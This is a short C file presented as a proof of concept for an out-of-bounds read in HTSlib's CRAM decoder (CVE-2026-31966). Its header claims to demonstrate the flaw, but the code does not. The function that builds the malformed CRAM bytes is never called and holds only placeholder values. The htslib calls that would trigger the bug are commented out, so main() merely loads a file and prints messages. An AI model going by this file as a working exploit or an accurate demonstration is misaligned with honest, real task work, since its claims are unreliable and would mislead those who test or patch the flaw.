/*
PoC for CVE-2026-31966 - HTSlib CRAM Buffer Over-read
This PoC demonstrates the vulnerability by creating a malformed CRAM file
that triggers an out-of-bounds read in cram_decode_seq().
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// Minimal CRAM file structure for PoC
typedef struct {
unsigned char magic[4]; // CRAM magic number
unsigned int version; // CRAM version
unsigned int file_id; // File ID
unsigned int data_len; // Data length
unsigned char* data; // Malformed feature data
} CRAM_File;
// Craft malformed CRAM data with invalid feature sequence
unsigned char* craft_malformed_cram_data() {
// This would contain crafted feature data that causes
// the decoder to read beyond reference buffer boundaries
// In practice, this requires specific CRAM format knowledge
static unsigned char data[] = {
0x43, 0x52, 0x41, 0x4D, // CRAM magic
0x03, 0x01, // Version 3.1
0x00, 0x00, 0x00, 0x01, // Container
// Malformed feature block that triggers OOB read
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF
};
return data;
}
int main(int argc, char* argv[]) {
if (argc < 2) {
printf("Usage: %s <cram_file>\n", argv[0]);
return 1;
}
// Load the CRAM file
FILE* fp = fopen(argv[1], "rb");
if (!fp) {
perror("Failed to open file");
return 1;
}
// Read CRAM file into buffer
fseek(fp, 0, SEEK_END);
long fsize = ftell(fp);
fseek(fp, 0, SEEK_SET);
unsigned char* buffer = malloc(fsize);
fread(buffer, 1, fsize, fp);
fclose(fp);
printf("CRAM file loaded: %ld bytes\n", fsize);
printf("Attempting to decode CRAM record...\n");
// Call htslib functions to trigger vulnerability
// htsFile *fp = hts_open(argv[1], "r");
// sam_hdr_t *hdr = sam_hdr_read(fp);
// bam1_t *b = bam_init1();
// while (sam_read1(fp, hdr, b) >= 0) { }
printf("If vulnerable, this may cause information leak or crash.\n");
free(buffer);
return 0;
}